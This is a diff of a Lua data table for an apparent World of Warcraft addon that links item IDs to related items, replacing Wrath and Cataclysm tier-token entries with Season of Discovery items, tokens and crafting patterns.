-- Sanctified Scourgelord Handguards - ["51307"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- H.A.Z.A.R.D. Boots + ["213335"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Legguards - ["51308"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Hyperconductive Walkers + ["213336"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Pauldrons - ["51309"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Hyperconductive Sandals + ["213337"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Battleplate - ["51310"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Electromantic Grounding Boots + ["213338"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Gauntlets - ["51311"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Electromantic Grounding Sabatons + ["213339"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Helmet - ["51312"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Insulated Workboots + ["213341"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Legplates - ["51313"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Insulated Galoshes + ["213342"] = { + 217007, -- Power Depleted Boots }, - -- Sanctified Scourgelord Shoulderplates - ["51314"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Justice Badge + ["213343"] = { + 217351, -- Thermaplugg's Engineering Notes }, - -- Vanquisher's Mark of Sanctification - ["52025"] = { - 51125, -- Sanctified Scourgelord Shoulderplates - 51126, -- Sanctified Scourgelord Legplates - 51127, -- Sanctified Scourgelord Helmet - 51128, -- Sanctified Scourgelord Gauntlets - 51129, -- Sanctified Scourgelord Battleplate - 51130, -- Sanctified Scourgelord Pauldrons - 51131, -- Sanctified Scourgelord Legguards - 51132, -- Sanctified Scourgelord Handguards - 51133, -- Sanctified Scourgelord Faceguard - 51134, -- Sanctified Scourgelord Chestguard - 51135, -- Sanctified Lasherweave Pauldrons - 51136, -- Sanctified Lasherweave Legplates - 51137, -- Sanctified Lasherweave Helmet - 51138, -- Sanctified Lasherweave Gauntlets - 51139, -- Sanctified Lasherweave Robes - 51140, -- Sanctified Lasherweave Shoulderpads - 51141, -- Sanctified Lasherweave Raiment - 51142, -- Sanctified Lasherweave Legguards - 51143, -- Sanctified Lasherweave Headguard - 51144, -- Sanctified Lasherweave Handgrips - 51145, -- Sanctified Lasherweave Vestment - 51146, -- Sanctified Lasherweave Trousers - 51147, -- Sanctified Lasherweave Mantle - 51148, -- Sanctified Lasherweave Gloves - 51149, -- Sanctified Lasherweave Cover - 51155, -- Sanctified Bloodmage Shoulderpads - 51156, -- Sanctified Bloodmage Robe - 51157, -- Sanctified Bloodmage Leggings - 51158, -- Sanctified Bloodmage Hood - 51159, -- Sanctified Bloodmage Gloves - 51185, -- Sanctified Shadowblade Pauldrons - 51186, -- Sanctified Shadowblade Legplates - 51187, -- Sanctified Shadowblade Helmet - 51188, -- Sanctified Shadowblade Gauntlets - 51189, -- Sanctified Shadowblade Breastplate + -- Gnomeregan Peace Officer's Torque + ["213344"] = { + 217351, -- Thermaplugg's Engineering Notes }, - -- Protector's Mark of Sanctification - ["52026"] = { - 51150, -- Sanctified Ahn'Kahar Blood Hunter's Tunic - 51151, -- Sanctified Ahn'Kahar Blood Hunter's Spaulders - 51152, -- Sanctified Ahn'Kahar Blood Hunter's Legguards - 51153, -- Sanctified Ahn'Kahar Blood Hunter's Headpiece - 51154, -- Sanctified Ahn'Kahar Blood Hunter's Handguards - 51190, -- Sanctified Frost Witch's Tunic - 51191, -- Sanctified Frost Witch's Handguards - 51192, -- Sanctified Frost Witch's Headpiece - 51193, -- Sanctified Frost Witch's Legguards - 51194, -- Sanctified Frost Witch's Spaulders - 51195, -- Sanctified Frost Witch's Chestguard - 51196, -- Sanctified Frost Witch's Grips - 51197, -- Sanctified Frost Witch's Faceguard - 51198, -- Sanctified Frost Witch's War-Kilt - 51199, -- Sanctified Frost Witch's Shoulderguards - 51200, -- Sanctified Frost Witch's Hauberk - 51201, -- Sanctified Frost Witch's Gloves - 51202, -- Sanctified Frost Witch's Helm - 51203, -- Sanctified Frost Witch's Kilt - 51204, -- Sanctified Frost Witch's Shoulderpads - 51210, -- Sanctified Ymirjar Lord's Shoulderplates - 51211, -- Sanctified Ymirjar Lord's Legplates - 51212, -- Sanctified Ymirjar Lord's Helmet - 51213, -- Sanctified Ymirjar Lord's Gauntlets - 51214, -- Sanctified Ymirjar Lord's Battleplate - 51215, -- Sanctified Ymirjar Lord's Pauldrons - 51216, -- Sanctified Ymirjar Lord's Legguards - 51217, -- Sanctified Ymirjar Lord's Handguards - 51218, -- Sanctified Ymirjar Lord's Greathelm - 51219, -- Sanctified Ymirjar Lord's Breastplate + -- Piston Pendant + ["213345"] = { + 217351, -- Thermaplugg's Engineering Notes }, - -- Conqueror's Mark of Sanctification - ["52027"] = { - 51160, -- Sanctified Lightsworn Shoulderplates - 51161, -- Sanctified Lightsworn Legplates - 51162, -- Sanctified Lightsworn Helmet - 51163, -- Sanctified Lightsworn Gauntlets - 51164, -- Sanctified Lightsworn Battleplate - 51165, -- Sanctified Lightsworn Tunic - 51166, -- Sanctified Lightsworn Spaulders - 51167, -- Sanctified Lightsworn Headpiece - 51168, -- Sanctified Lightsworn Greaves - 51169, -- Sanctified Lightsworn Gloves - 51170, -- Sanctified Lightsworn Shoulderguards - 51171, -- Sanctified Lightsworn Legguards - 51172, -- Sanctified Lightsworn Handguards - 51173, -- Sanctified Lightsworn Faceguard - 51174, -- Sanctified Lightsworn Chestguard - 51175, -- Sanctified Crimson Acolyte Shoulderpads - 51176, -- Sanctified Crimson Acolyte Robe - 51177, -- Sanctified Crimson Acolyte Leggings - 51178, -- Sanctified Crimson Acolyte Hood - 51179, -- Sanctified Crimson Acolyte Gloves - 51180, -- Sanctified Crimson Acolyte Raiments - 51181, -- Sanctified Crimson Acolyte Pants - 51182, -- Sanctified Crimson Acolyte Mantle - 51183, -- Sanctified Crimson Acolyte Handwraps - 51184, -- Sanctified Crimson Acolyte Cowl - 51205, -- Sanctified Dark Coven Shoulderpads - 51206, -- Sanctified Dark Coven Robe - 51207, -- Sanctified Dark Coven Leggings - 51208, -- Sanctified Dark Coven Hood - 51209, -- Sanctified Dark Coven Gloves + -- Pendant of Homecoming + ["213346"] = { + 217351, -- Thermaplugg's Engineering Notes }, - -- Vanquisher's Mark of Sanctification - ["52028"] = { - 51250, -- Sanctified Shadowblade Breastplate - 51251, -- Sanctified Shadowblade Gauntlets - 51252, -- Sanctified Shadowblade Helmet - 51253, -- Sanctified Shadowblade Legplates - 51254, -- Sanctified Shadowblade Pauldrons - 51280, -- Sanctified Bloodmage Gloves - 51281, -- Sanctified Bloodmage Hood - 51282, -- Sanctified Bloodmage Leggings - 51283, -- Sanctified Bloodmage Robe - 51284, -- Sanctified Bloodmage Shoulderpads - 51290, -- Sanctified Lasherweave Cover - 51291, -- Sanctified Lasherweave Gloves - 51292, -- Sanctified Lasherweave Mantle - 51293, -- Sanctified Lasherweave Trousers - 51294, -- Sanctified Lasherweave Vestment - 51295, -- Sanctified Lasherweave Handgrips - 51296, -- Sanctified Lasherweave Headguard - 51297, -- Sanctified Lasherweave Legguards - 51298, -- Sanctified Lasherweave Raiment - 51299, -- Sanctified Lasherweave Shoulderpads - 51300, -- Sanctified Lasherweave Robes - 51301, -- Sanctified Lasherweave Gauntlets - 51302, -- Sanctified Lasherweave Helmet - 51303, -- Sanctified Lasherweave Legplates - 51304, -- Sanctified Lasherweave Pauldrons - 51305, -- Sanctified Scourgelord Chestguard - 51306, -- Sanctified Scourgelord Faceguard - 51307, -- Sanctified Scourgelord Handguards - 51308, -- Sanctified Scourgelord Legguards - 51309, -- Sanctified Scourgelord Pauldrons - 51310, -- Sanctified Scourgelord Battleplate - 51311, -- Sanctified Scourgelord Gauntlets - 51312, -- Sanctified Scourgelord Helmet - 51313, -- Sanctified Scourgelord Legplates - 51314, -- Sanctified Scourgelord Shoulderplates + -- Shockforged Battleboots + ["216484"] = { + 217007, -- Power Depleted Boots }, - -- Protector's Mark of Sanctification - ["52029"] = { - 51220, -- Sanctified Ymirjar Lord's Breastplate - 51221, -- Sanctified Ymirjar Lord's Greathelm - 51222, -- Sanctified Ymirjar Lord's Handguards - 51223, -- Sanctified Ymirjar Lord's Legguards - 51224, -- Sanctified Ymirjar Lord's Pauldrons - 51225, -- Sanctified Ymirjar Lord's Battleplate - 51226, -- Sanctified Ymirjar Lord's Gauntlets - 51227, -- Sanctified Ymirjar Lord's Helmet - 51228, -- Sanctified Ymirjar Lord's Legplates - 51229, -- Sanctified Ymirjar Lord's Shoulderplates - 51235, -- Sanctified Frost Witch's Shoulderpads - 51236, -- Sanctified Frost Witch's Kilt - 51237, -- Sanctified Frost Witch's Helm - 51238, -- Sanctified Frost Witch's Gloves - 51239, -- Sanctified Frost Witch's Hauberk - 51240, -- Sanctified Frost Witch's Shoulderguards - 51241, -- Sanctified Frost Witch's War-Kilt - 51242, -- Sanctified Frost Witch's Faceguard - 51243, -- Sanctified Frost Witch's Grips - 51244, -- Sanctified Frost Witch's Chestguard - 51245, -- Sanctified Frost Witch's Spaulders - 51246, -- Sanctified Frost Witch's Legguards - 51247, -- Sanctified Frost Witch's Headpiece - 51248, -- Sanctified Frost Witch's Handguards - 51249, -- Sanctified Frost Witch's Tunic - 51285, -- Sanctified Ahn'Kahar Blood Hunter's Handguards - 51286, -- Sanctified Ahn'Kahar Blood Hunter's Headpiece - 51287, -- Sanctified Ahn'Kahar Blood Hunter's Legguards - 51288, -- Sanctified Ahn'Kahar Blood Hunter's Spaulders - 51289, -- Sanctified Ahn'Kahar Blood Hunter's Tunic + -- Shockforged Breastplate + ["216485"] = { + 217008, -- Power Depleted Chest }, - -- Conqueror's Mark of Sanctification - ["52030"] = { - 51230, -- Sanctified Dark Coven Gloves - 51231, -- Sanctified Dark Coven Hood - 51232, -- Sanctified Dark Coven Leggings - 51233, -- Sanctified Dark Coven Robe - 51234, -- Sanctified Dark Coven Shoulderpads - 51255, -- Sanctified Crimson Acolyte Cowl - 51256, -- Sanctified Crimson Acolyte Handwraps - 51257, -- Sanctified Crimson Acolyte Mantle - 51258, -- Sanctified Crimson Acolyte Pants - 51259, -- Sanctified Crimson Acolyte Raiments - 51260, -- Sanctified Crimson Acolyte Gloves - 51261, -- Sanctified Crimson Acolyte Hood - 51262, -- Sanctified Crimson Acolyte Leggings - 51263, -- Sanctified Crimson Acolyte Robe - 51264, -- Sanctified Crimson Acolyte Shoulderpads - 51265, -- Sanctified Lightsworn Chestguard - 51266, -- Sanctified Lightsworn Faceguard - 51267, -- Sanctified Lightsworn Handguards - 51268, -- Sanctified Lightsworn Legguards - 51269, -- Sanctified Lightsworn Shoulderguards - 51270, -- Sanctified Lightsworn Gloves - 51271, -- Sanctified Lightsworn Greaves - 51272, -- Sanctified Lightsworn Headpiece - 51273, -- Sanctified Lightsworn Spaulders - 51274, -- Sanctified Lightsworn Tunic - 51275, -- Sanctified Lightsworn Battleplate - 51276, -- Sanctified Lightsworn Gauntlets - 51277, -- Sanctified Lightsworn Helmet - 51278, -- Sanctified Lightsworn Legplates - 51279, -- Sanctified Lightsworn Shoulderplates + -- Shockforged Legplates + ["216486"] = { + 217009, -- Power Depleted Legs }, - -- Firelord's Hood - ["60243"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Reins of the Bengal Tiger + ["216549"] = { + 8630, -- Reins of the Bengal Tiger + }, + -- Reins of the Golden Sabercat + ["216570"] = { + 12327, -- Reins of the Golden Sabercat + }, + -- Grime-Encrusted Ring + ["216661"] = { + 9326, -- Grime-Encrusted Ring + }, + -- Brilliant Gold Ring + ["216662"] = { + 9362, -- Brilliant Gold Ring + }, + -- Sergeant Major's Dragonhide Armsplints + ["216698"] = { + 18454, -- Sergeant Major's Dragonhide Armsplints + 18455, -- Sergeant Major's Dragonhide Armsplints + }, + -- Sergeant Major's Chain Armguards + ["216699"] = { + 18448, -- Sergeant Major's Chain Armguards + 18449, -- Sergeant Major's Chain Armguards + }, + -- Sergeant Major's Leather Armsplints + ["216700"] = { + 18452, -- Sergeant Major's Leather Armsplints + 18453, -- Sergeant Major's Leather Armsplints + }, + -- Sergeant Major's Plate Wristguards + ["216701"] = { + 18445, -- Sergeant Major's Plate Wristguards + 18447, -- Sergeant Major's Plate Wristguards + }, + -- Sergeant Major's Silk Cuffs + ["216702"] = { + 18456, -- Sergeant Major's Silk Cuffs + 18457, -- Sergeant Major's Silk Cuffs + }, + -- First Sergeant's Mail Wristguards + ["216703"] = { + 16532, -- First Sergeant's Mail Wristguards + 18432, -- First Sergeant's Mail Wristguards + }, + -- First Sergeant's Dragonhide Armguards + ["216704"] = { + 18434, -- First Sergeant's Dragonhide Armguards + 18436, -- First Sergeant's Dragonhide Armguards + }, + -- First Sergeant's Plate Bracers + ["216705"] = { + 18429, -- First Sergeant's Plate Bracers + 18430, -- First Sergeant's Plate Bracers + }, + -- First Sergeant's Leather Armguards + ["216706"] = { + 16497, -- First Sergeant's Leather Armguards + 18435, -- First Sergeant's Leather Armguards + }, + -- First Sergeant's Silk Cuffs + ["216707"] = { + 16486, -- First Sergeant's Silk Cuffs + 18437, -- First Sergeant's Silk Cuffs + }, + -- Repairman's Cape + ["217005"] = { + 9605, -- Repairman's Cape + }, + -- Mechanic's Pipehammer + ["217006"] = { + 9604, -- Mechanic's Pipehammer }, - -- Firelord's Mantle - ["60246"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Power Depleted Boots + ["217007"] = { + 213335, -- H.A.Z.A.R.D. Boots + 213336, -- Hyperconductive Walkers + 213337, -- Hyperconductive Sandals + 213338, -- Electromantic Grounding Boots + 213339, -- Electromantic Grounding Sabatons + 213341, -- Insulated Workboots + 213342, -- Insulated Galoshes + 216484, -- Shockforged Battleboots }, - -- Shadowflame Hood - ["60249"] = { - 63683, -- Helm of the Forlorn Conqueror + -- Power Depleted Chest + ["217008"] = { + 213310, -- Hyperconductive Shimmershirt + 213311, -- Hyperconductive Robe + 213312, -- Insulated Apron + 213313, -- Insulated Chestguard + 213314, -- Electromantic Chainmail + 213315, -- Electromantic Chainshirt + 213316, -- H.A.Z.A.R.D. Breastplate + 216485, -- Shockforged Breastplate }, - -- Shadowflame Mantle - ["60252"] = { - 64315, -- Mantle of the Forlorn Conqueror + -- Power Depleted Legs + ["217009"] = { + 213328, -- Hyperconductive Pantaloons + 213329, -- Hyperconductive Skirt + 213330, -- H.A.Z.A.R.D. Legplates + 213331, -- Insulated Leggings + 213332, -- Insulated Legguards + 213333, -- Electromantic Chausses + 213334, -- Electromantic Gambeson + 216486, -- Shockforged Legplates }, - -- Mercurial Shoulderwraps - ["60253"] = { - 64315, -- Mantle of the Forlorn Conqueror + -- Supply Bag + ["217014"] = { + 22679, -- Supply Bag }, - -- Mercurial Hood - ["60256"] = { - 63683, -- Helm of the Forlorn Conqueror + -- Fishing Tournament! + ["217017"] = { + 19978, -- Fishing Tournament! }, - -- Mercurial Cowl - ["60258"] = { - 63683, -- Helm of the Forlorn Conqueror + -- Pattern: Crimson Silk Robe + ["217244"] = { + 7088, -- Pattern: Crimson Silk Robe }, - -- Mercurial Mantle - ["60262"] = { - 64315, -- Mantle of the Forlorn Conqueror + -- Crimson Silk Robe + ["217245"] = { + 7063, -- Crimson Silk Robe }, - -- Stormrider's Helm - ["60277"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Black Mageweave Vest + ["217246"] = { + 9998, -- Black Mageweave Vest }, - -- Stormrider's Mantle - ["60279"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Black Mageweave Leggings + ["217247"] = { + 9999, -- Black Mageweave Leggings }, - -- Stormrider's Cover - ["60282"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Earthen Silk Belt + ["217248"] = { + 7061, -- Earthen Silk Belt }, - -- Stormrider's Shoulderwraps - ["60284"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Pattern: Earthen Silk Belt + ["217249"] = { + 7086, -- Pattern: Earthen Silk Belt }, - -- Stormrider's Headpiece - ["60286"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Crimson Silk Shoulders + ["217250"] = { + 7059, -- Crimson Silk Shoulders }, - -- Stormrider's Spaulders - ["60289"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Pattern: Crimson Silk Shoulders + ["217251"] = { + 7084, -- Pattern: Crimson Silk Shoulders }, - -- Wind Dancer's Helmet - ["60299"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Long Silken Cloak + ["217252"] = { + 4326, -- Long Silken Cloak }, - -- Wind Dancer's Spaulders - ["60302"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Boots of the Enchanter + ["217253"] = { + 4325, -- Boots of the Enchanter }, - -- Lightning-Charged Headguard - ["60303"] = { - 63684, -- Helm of the Forlorn Protector + -- Pattern: Boots of the Enchanter + ["217254"] = { + 4352, -- Pattern: Boots of the Enchanter }, - -- Lightning-Charged Spaulders - ["60306"] = { - 64316, -- Mantle of the Forlorn Protector + -- Crimson Silk Belt + ["217255"] = { + 7055, -- Crimson Silk Belt }, - -- Faceguard of the Raging Elements - ["60308"] = { - 63684, -- Helm of the Forlorn Protector + -- Earthen Vest + ["217256"] = { + 7051, -- Earthen Vest }, - -- Mantle of the Raging Elements - ["60311"] = { - 64316, -- Mantle of the Forlorn Protector + -- Enchanter's Cowl + ["217257"] = { + 4322, -- Enchanter's Cowl }, - -- Headpiece of the Raging Elements - ["60315"] = { - 63684, -- Helm of the Forlorn Protector + -- Pattern: Enchanter's Cowl + ["217258"] = { + 14630, -- Pattern: Enchanter's Cowl }, - -- Shoulderwraps of the Raging Elements - ["60317"] = { - 64316, -- Mantle of the Forlorn Protector + -- Big Voodoo Mask + ["217259"] = { + 8201, -- Big Voodoo Mask }, - -- Helmet of the Raging Elements - ["60320"] = { - 63684, -- Helm of the Forlorn Protector + -- Pattern: Big Voodoo Mask + ["217260"] = { + 8387, -- Pattern: Big Voodoo Mask }, - -- Spaulders of the Raging Elements - ["60322"] = { - 64316, -- Mantle of the Forlorn Protector + -- Big Voodoo Robe + ["217261"] = { + 8200, -- Big Voodoo Robe }, - -- Earthen Helmet - ["60325"] = { - 63684, -- Helm of the Forlorn Protector + -- Pattern: Big Voodoo Robe + ["217262"] = { + 8386, -- Pattern: Big Voodoo Robe }, - -- Earthen Pauldrons - ["60327"] = { - 64316, -- Mantle of the Forlorn Protector + -- Guardian Leather Bracers + ["217263"] = { + 4260, -- Guardian Leather Bracers }, - -- Earthen Faceguard - ["60328"] = { - 63684, -- Helm of the Forlorn Protector + -- Pattern: Guardian Leather Bracers + ["217264"] = { + 4300, -- Pattern: Guardian Leather Bracers }, - -- Earthen Shoulderguards - ["60331"] = { - 64316, -- Mantle of the Forlorn Protector + -- Guardian Belt + ["217265"] = { + 4258, -- Guardian Belt }, - -- Magma Plated Helmet - ["60341"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Pattern: Guardian Belt + ["217266"] = { + 4298, -- Pattern: Guardian Belt }, - -- Magma Plated Pauldrons - ["60343"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Guardian Pants + ["217267"] = { + 5962, -- Guardian Pants }, - -- Reinforced Sapphirium Helmet - ["60346"] = { - 63683, -- Helm of the Forlorn Conqueror + -- Turtle Scale Breastplate + ["217268"] = { + 8189, -- Turtle Scale Breastplate }, - -- Reinforced Sapphirium Pauldrons - ["60348"] = { - 64315, -- Mantle of the Forlorn Conqueror + -- Turtle Scale Gloves + ["217270"] = { + 8187, -- Turtle Scale Gloves }, - -- Magma Plated Faceguard - ["60351"] = { - 63682, -- Helm of the Forlorn Vanquisher + -- Pattern: Turtle Scale Gloves + ["217271"] = { + 8385, -- Pattern: Turtle Scale Gloves }, - -- Magma Plated Shoulderguards - ["60353"] = { - 64314, -- Mantle of the Forlorn Vanquisher + -- Golden Scale Gauntlets + ["217273"] = { + 9366, -- Golden Scale Gauntlets }, - -- Reinforced Sapphirium Faceguard - ["60356"] = { - 63683, -- Helm of the Forlorn Conqueror + -- Plans: Golden Scale Gauntlets + ["217274"] = { + 9367, -- Plans: Golden Scale Gauntlets }, - -- Reinforced Sapphirium Shoulderguards - ["60358"] = { - 64315, -- Mantle of the Forlorn Conqueror + -- Golden Scale Boots + ["217275"] = { + 3847, -- Golden Scale Boots }, - -- Reinforced Sapphirium Headguard - ["60359"] = { - 63683, -- Helm of the Forlorn Conqueror + -- Plans: Golden Scale Boots + ["217276"] = { + 3875, -- Plans: Golden Scale Boots + }, + -- Golden Scale Cuirass + ["217277"] = { + 3845, -- Golden Scale Cuirass + }, + -- Plans: Golden Scale Cuirass + ["217278"] = { + 3873, -- Plans: Golden Scale Cuirass }, - -- Reinforced Sapphirium Mantle - ["60362"] = { - 64315, -- Mantle of the Forlorn Conqueror + -- Golden Scale Coif + ["217279"] = { + 3837, -- Golden Scale Coif }, - -- Helm of the Forlorn Vanquisher - ["63682"] = { - 60243, -- Firelord's Hood - 60277, -- Stormrider's Helm - 60282, -- Stormrider's Cover - 60286, -- Stormrider's Headpiece - 60299, -- Wind Dancer's Helmet - 60341, -- Magma Plated Helmet - 60351, -- Magma Plated Faceguard + -- Plans: Golden Scale Coif + ["217280"] = { + 6047, -- Plans: Golden Scale Coif }, - -- Helm of the Forlorn Conqueror - ["63683"] = { - 60249, -- Shadowflame Hood - 60256, -- Mercurial Hood - 60258, -- Mercurial Cowl - 60346, -- Reinforced Sapphirium Helmet - 60356, -- Reinforced Sapphirium Faceguard - 60359, -- Reinforced Sapphirium Headguard + -- Moonsteel Broadsword + ["217281"] = { + 3853, -- Moonsteel Broadsword }, - -- Helm of the Forlorn Protector - ["63684"] = { - 60303, -- Lightning-Charged Headguard - 60308, -- Faceguard of the Raging Elements - 60315, -- Headpiece of the Raging Elements - 60320, -- Helmet of the Raging Elements - 60325, -- Earthen Helmet - 60328, -- Earthen Faceguard + -- Plans: Moonsteel Broadsword + ["217282"] = { + 12163, -- Plans: Moonsteel Broadsword }, - -- Mantle of the Forlorn Vanquisher - ["64314"] = { - 60246, -- Firelord's Mantle - 60279, -- Stormrider's Mantle - 60284, -- Stormrider's Shoulderwraps - 60289, -- Stormrider's Spaulders - 60302, -- Wind Dancer's Spaulders - 60343, -- Magma Plated Pauldrons - 60353, -- Magma Plated Shoulderguards + -- Golden Scale Shoulders + ["217283"] = { + 3841, -- Golden Scale Shoulders }, - -- Mantle of the Forlorn Conqueror - ["64315"] = { - 60252, -- Shadowflame Mantle - 60253, -- Mercurial Shoulderwraps - 60262, -- Mercurial Mantle - 60348, -- Reinforced Sapphirium Pauldrons - 60358, -- Reinforced Sapphirium Shoulderguards - 60362, -- Reinforced Sapphirium Mantle + -- Plans: Golden Scale Shoulders + ["217284"] = { + 3871, -- Plans: Golden Scale Shoulders }, - -- Mantle of the Forlorn Protector - ["64316"] = { - 60306, -- Lightning-Charged Spaulders - 60311, -- Mantle of the Raging Elements - 60317, -- Shoulderwraps of the Raging Elements - 60322, -- Spaulders of the Raging Elements - 60327, -- Earthen Pauldrons - 60331, -- Earthen Shoulderguards + -- Golden Scale Leggings + ["217285"] = { + 3843, -- Golden Scale Leggings }, - -- Crown of the Forlorn Protector - ["65000"] = { - 65206, -- Lightning-Charged Headguard - 65246, -- Faceguard of the Raging Elements - 65251, -- Helmet of the Raging Elements - 65256, -- Headpiece of the Raging Elements - 65266, -- Earthen Helmet - 65271, -- Earthen Faceguard + -- Plans: Golden Scale Leggings + ["217286"] = { + 3872, -- Plans: Golden Scale Leggings }, - -- Crown of the Forlorn Conqueror - ["65001"] = { - 65216, -- Reinforced Sapphirium Helmet - 65221, -- Reinforced Sapphirium Headguard - 65226, -- Reinforced Sapphirium Faceguard - 65230, -- Mercurial Cowl - 65235, -- Mercurial Hood - 65260, -- Shadowflame Hood + -- Greater Mystic Wand + ["217287"] = { + 11290, -- Greater Mystic Wand }, - -- Crown of the Forlorn Vanquisher - ["65002"] = { - 65181, -- Magma Plated Helmet - 65186, -- Magma Plated Faceguard - 65190, -- Stormrider's Headpiece - 65195, -- Stormrider's Helm - 65200, -- Stormrider's Cover - 65210, -- Firelord's Hood - 65241, -- Wind Dancer's Helmet + -- Robes of the Lich + ["217288"] = { + 10762, -- Robes of the Lich }, - -- Shoulders of the Forlorn Protector - ["65087"] = { - 65208, -- Lightning-Charged Spaulders - 65248, -- Mantle of the Raging Elements - 65253, -- Spaulders of the Raging Elements - 65258, -- Shoulderwraps of the Raging Elements - 65268, -- Earthen Pauldrons - 65273, -- Earthen Shoulderguards + -- Deathchill Armor + ["217289"] = { + 10764, -- Deathchill Armor }, - -- Shoulders of the Forlorn Conqueror - ["65088"] = { - 65218, -- Reinforced Sapphirium Pauldrons - 65223, -- Reinforced Sapphirium Mantle - 65228, -- Reinforced Sapphirium Shoulderguards - 65233, -- Mercurial Mantle - 65238, -- Mercurial Shoulderwraps - 65263, -- Shadowflame Mantle + -- Glowing Eye of Mordresh + ["217290"] = { + 10769, -- Glowing Eye of Mordresh }, - -- Shoulders of the Forlorn Vanquisher - ["65089"] = { - 65183, -- Magma Plated Pauldrons - 65188, -- Magma Plated Shoulderguards - 65193, -- Stormrider's Spaulders - 65198, -- Stormrider's Mantle - 65203, -- Stormrider's Shoulderwraps - 65213, -- Firelord's Mantle - 65243, -- Wind Dancer's Spaulders + -- Mordresh's Lifeless Skull + ["217291"] = { + 10770, -- Mordresh's Lifeless Skull }, - -- Magma Plated Battleplate - ["65179"] = { - 67425, -- Chest of the Forlorn Vanquisher + -- Deathmage Sash + ["217292"] = { + 10771, -- Deathmage Sash }, - -- Magma Plated Gauntlets - ["65180"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Silky Spider Cape + ["217293"] = { + 10776, -- Silky Spider Cape }, - -- Magma Plated Helmet - ["65181"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Embalmed Shroud + ["217294"] = { + 7691, -- Embalmed Shroud }, - -- Magma Plated Legplates - ["65182"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Necrotic Wand + ["217295"] = { + 7708, -- Necrotic Wand }, - -- Magma Plated Pauldrons - ["65183"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Ghostshard Talisman + ["217296"] = { + 7731, -- Ghostshard Talisman }, - -- Magma Plated Chestguard - ["65184"] = { - 67425, -- Chest of the Forlorn Vanquisher + -- Robe of Doan + ["217297"] = { + 7711, -- Robe of Doan }, - -- Magma Plated Handguards - ["65185"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Mantle of Doan + ["217298"] = { + 7712, -- Mantle of Doan }, - -- Magma Plated Faceguard - ["65186"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Illusionary Rod + ["217299"] = { + 7713, -- Illusionary Rod }, - -- Magma Plated Legguards - ["65187"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Whitemane's Chapeau + ["217300"] = { + 7720, -- Whitemane's Chapeau }, - -- Magma Plated Shoulderguards - ["65188"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Triune Amulet + ["217301"] = { + 7722, -- Triune Amulet }, - -- Stormrider's Grips - ["65189"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Mograine's Might + ["217302"] = { + 7723, -- Mograine's Might }, - -- Stormrider's Headpiece - ["65190"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Stoneweaver Leggings + ["217303"] = { + 9407, -- Stoneweaver Leggings }, - -- Stormrider's Legguards - ["65191"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Revelosh's Gloves + ["217304"] = { + 9390, -- Revelosh's Gloves }, - -- Stormrider's Raiment - ["65192"] = { - 67425, -- Chest of the Forlorn Vanquisher + -- Revelosh's Armguards + ["217305"] = { + 9388, -- Revelosh's Armguards }, - -- Stormrider's Spaulders - ["65193"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Revelosh's Boots + ["217306"] = { + 9387, -- Revelosh's Boots }, - -- Stormrider's Handwraps - ["65194"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Revelosh's Spaulders + ["217307"] = { + 9389, -- Revelosh's Spaulders }, - -- Stormrider's Helm - ["65195"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Moonsight Rifle + ["217314"] = { + 4383, -- Moonsight Rifle }, - -- Stormrider's Legwraps - ["65196"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Precision Bow + ["217315"] = { + 8183, -- Precision Bow }, - -- Stormrider's Robes - ["65197"] = { - 67425, -- Chest of the Forlorn Vanquisher + -- Thermaplugg's Engineering Notes + ["217351"] = { + 213343, -- Justice Badge + 213344, -- Gnomeregan Peace Officer's Torque + 213345, -- Piston Pendant + 213346, -- Pendant of Homecoming }, - -- Stormrider's Mantle - ["65198"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Invisibility Potion + ["217693"] = { + 9172, -- Invisibility Potion }, - -- Stormrider's Gloves - ["65199"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Ironshod Bludgeon + ["217704"] = { + 9408, -- Ironshod Bludgeon }, - -- Stormrider's Cover - ["65200"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Drakeclaw Band of the Berserker + ["220626"] = { + 221363, -- Scapula of the Fallen Avatar }, - -- Stormrider's Leggings - ["65201"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Drakeclaw Band of the Stalker + ["220627"] = { + 221363, -- Scapula of the Fallen Avatar }, - -- Stormrider's Vestment - ["65202"] = { - 67425, -- Chest of the Forlorn Vanquisher + 